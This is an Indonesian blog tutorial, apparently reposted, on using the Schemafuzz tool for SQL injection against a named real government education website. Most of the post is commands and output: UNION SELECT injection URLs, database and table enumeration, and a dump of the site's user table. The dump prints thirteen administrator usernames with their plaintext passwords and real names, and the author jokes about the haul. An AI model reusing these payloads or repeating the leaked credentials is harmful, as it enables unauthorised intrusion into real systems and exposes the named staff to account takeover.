Ads by Google

SCHEMAFUZZ DOWNLOAD DAN CARA PAKAI

Biasanya, SQL injection yang biasa dilakukan manual tidak evisien sama sekali, meskipun hal tersebut dapat mengasah skill kita. Dari pada tool GUI seperti Havij yang berbayar, Schemafuzz bisa dijadikan andalan. Okeh... Langsung saja di "lahap"
Tool yang dibutuhkan:
1.Python disini
2.Schemafuzz disini
3.CMD atau Console Linux


Dg cmd/console masuk ke folder tempat schemafuzz.py berada…
karena saya memakai Backtrack/Linux dan file Schemafuzz saya letakkan di folder "root" maka perintahnya adalah:

./schemafuzz.py
untuk windows,
cd c:\ enter
c:\>schemafuzz.py enter
Awali pertintah dengan format:
schemafuzz.py -u “url target” –perintah
List perintah ada dibawah…

1.Cari target
Misal: http://www.ditplb.or.id/profile.php?id=1

2.Masukkan perintah untuk mencari colom
Misal: schemafuzz.py -u “http://www.ditplb.or.id/profile.php?id=1″ –findcol
Maka keluar:
URL: http://www.ditplb.or.id/profile.php?id=1–

Evasion Used: “+” “–”

20:36:29
[-] Proxy Not Given

Attempting To find the number of columns…
Testing: 0,1,2,
Column Length is: 3
Found null column at column #: 2
SQLi URL: http://www.ditplb.or.id/profile.php?id=1...T+0,1,2–
darkc0de

URL: http://www.ditplb.or.id/profile.php?id=1...1,darkc0de
[-] Done!

Berarti kita gunain http://www.ditplb.or.id/profile.php?id=1...1,darkc0de untuk inject

3.Cari database dg command –dbs
Misal : schemafuzz.py -u “http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de” –dbs
Maka keluar:
URL: http://www.ditplb.or.id/profile.php?id=1...arkc0de–
Evasion Used: “+” “–”
20:39:32
[-] Proxy Not Given

Gathering MySQL Server Configuration…

Database: t15618_plb
User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8

Showing all databases current user has access too!
Number of Databases: 1
[0] t15618_plb

[-] 20:39:39

[-] Total URL Requests 3

[-] Done

keliatan kan nama databasenya t15618_plb

4.Cari nama table dalam database
Misal: schemafuzz.py -u ”
http://www.ditplb.or.id/profile.php?id=1...arkc0de” –schema -D namadatabase
Jadinya: schemafuzz.py -u “http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de” –schema -D t15618_plb
Maka keluar:

URL: http://www.ditplb.or.id/profile.php?id=1...arkc0de–
Evasion Used: “+” “–”
20:43:10
[-] Proxy Not Given
Gathering MySQL Server Configuration…

Database: t15618_plb

User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8
Showing Tables & Columns from database “t15618_plb”
Number of Tables: 11
[Database]: t15618_plb
[Table: Columns]
bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin
[-] 20:44:39
[-] Total URL Requests 43
[-] Done

Berarti web itu punya 11 tabel…. n nama kolomnya juga udah ada….. tinggal pilih deh mana yang mau ditelanjangin…hhehehe (emg cewek )

5.Melihat isi dari suatu tabel n kolom
Misal :schemafuzz.py -u ”
http://www.ditplb.or.id/profile.php?id=1...arkc0de” –dump -D namadatabase -T namatable -C namakolom
Jadinya :schemafuzz.py -u “http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de” –dump -D t15618_plb -T user -C ID_user,UserID,Password,Keterangan,Admin
Maka keluar:

URL: http://www.ditplb.or.id/profile.php?id=1...arkc0de–
Evasion Used: “+” “–”
20:53:46
[-] Proxy Not Given

Gathering MySQL Server Configuration…

Database: t15618_plb

User: t15618_plbid@localhost

Version: 5.0.32-Debian_7etch8

Dumping data from database “t15618_plb” Table “user”
and Column(s) ['ID_user', 'UserID', 'Password', 'Keterangan', 'Admin']
Number of Rows: 13
[0] 1:direktur:direkturplb:Direktur PLB:Admin Direktur PLB:

[1] 2:yusuf:siplb:Achmad Yusuf:Admin Achmad Yusuf:

[2] 3:abdulmukti:fatmawatimuktiTongue. Abdul Mukti:Admin P. Abdul Mukti:

[3] 4:harry:progkal:ProgKAL:Admin ProgKAL:

[4] 5:samino:kurikulum:Kurikulum:Admin Kurikulum:

[5] 6:mugiarsih:manajemen:Manajemen:Admin Manajemen:

[6] 7:sutopo:kesiswaan:Kesiswaan:Admin Kesiswaan:

[7] 8:winarno:sarana:Sarana:Admin Sarana:

[8] 9:sanusi:tatausaha:Tata Usaha:Admin Tata Usaha:

[9] 10:sutji:evaluasi:Evaluasi:Admin Evaluasi:

[10] 11:thamrin:informatika:Informatika:Admin Informatika:

[11] 12:adjie:kerjasama:Kerjasama:Admin Kerjasama:

[12] 13:media:media:Media:Admin Media:

[13] No data

[-] 20:54:14

[-] Total URL Requests 15

[-] Done

Weleh…. kok userid n passwordnya gak di encrypt ya……….. hehehe emang rejeki…..
hehehee

Cara diatas berlaku untuk sql versi 5 , untuk versi 4 gunakan perintah –fuzz untuk menemukan nama tabel n kolom
Misal:schemafuzz.py -U ”
http://www.ditplb.or.id/profile.php?id=1...arkc0de” –fuzz

Macam² perintah: ( menurutku )
–fuzz << mencari nama kolom n tabel pada sql v 4
–schema << melihat nama tabel
–dump << melihat isi kolom
–findcol << menemukan dakc0de ( colom )

source: http://rshx0r.info/archives/77

No comments:

Powered by Blogger.